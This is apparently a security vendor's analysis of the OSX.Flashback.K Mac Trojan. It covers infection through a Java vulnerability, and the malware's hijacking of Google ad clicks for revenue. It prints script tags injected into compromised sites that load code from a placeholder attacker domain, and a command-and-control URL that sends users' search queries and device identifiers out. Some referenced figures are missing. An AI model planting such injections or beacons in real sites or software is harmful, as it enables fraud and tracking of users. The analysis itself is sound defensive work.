We've been busy in the labs reverse engineering the various components of OSX.Flashback.K to determine the true motivation behind the malware. Let's take a look at this Mac Trojan in more detail.
The Infection
It's now well-known that the latest OSX.Flashback.K variant was being distributed using the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which was patched by Oracle in February. Unfortunately for Mac users, there was a large window of exposure since Apple's patch for this vulnerability was not available for six weeks.
This window of opportunity helped the Flashback Trojan to infect Macs on a large scale. The Flashback authors took advantage of the gap between Oracle and Apple's patches by exploiting vulnerable websites using Wordpress and Joomla to add malicious code snippets.
<script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script>
<script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>
If a user visited a compromised site on an unpatched Mac, OSX.Flashback.K would be installed. Here is a breakdown of the Flashback stages of infection:
- A user visits a compromised website.
- The browser is redirected to an exploit site hosting numerous Java exploits.
- CVE-2012-0507 is used to decrypt and install the initial OSX.Flashback.K component.
- This component downloads a loader and an Ad-clicking component.
Not much detail has been said about the ad-clicking component, so we will reveal the true motivation behind the malware: the end goal of this Trojan is revenue generation.
Ad-clicking Component
The Flashback ad-clicking component is loaded into Chrome, Firefox, and Safari where it can intercept all GET and POST requests from the browser. Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker's choosing, where they receive revenue from the click . (Google never receives the intended ad click.)
The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to the malicious server in the following form:
http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
Flashback uses a specially crafted user agent in these requests, which is actually the clients universally unique identifier (UUID) encoded in base64. This is already sent in the "ua" query string parameter, so it is likely that this is an effort to thwart "unknown" parties from investigating the URL with unrecognised user-agents.
The response is RC4 decrypted and then base64 decoded to reveal:
This hijacked ad click is based on a user searching for "toys". BIDOK is one of at least 5 commands that the Flashback expects to receive in response. However, for the ad-clicking component, this is the one we are interested in.
We can clearly see a value of 0.8 cents for the click and the redirection URL highlighted in red. This redirected URL is subsequently written into the browser so that the user is now directed to the new site, in effect hijacking the ad click Google should have received.
Here is the embedded script that will be inserted into the user's browser if the modified [REDIRECT_URL] equals [http://]ecomint.com/?q=toys.
This ultimately results in lost revenue for Google and untold sums of money for the Flashback gang.
Ad-clicking Trojans are nothing new and in an analysis of W32.Xpaj.B last August a botnet measuring in the region of 25,000 infections could generate the author up to $450 per day. Considering the Flashback Trojan measures in the hundreds of thousands, this figure could sharply rise to the order of $10000 per day.
A very profitable enterprise indeed, and all the more reason to keep your Mac fully patched and your virus definitions up to date.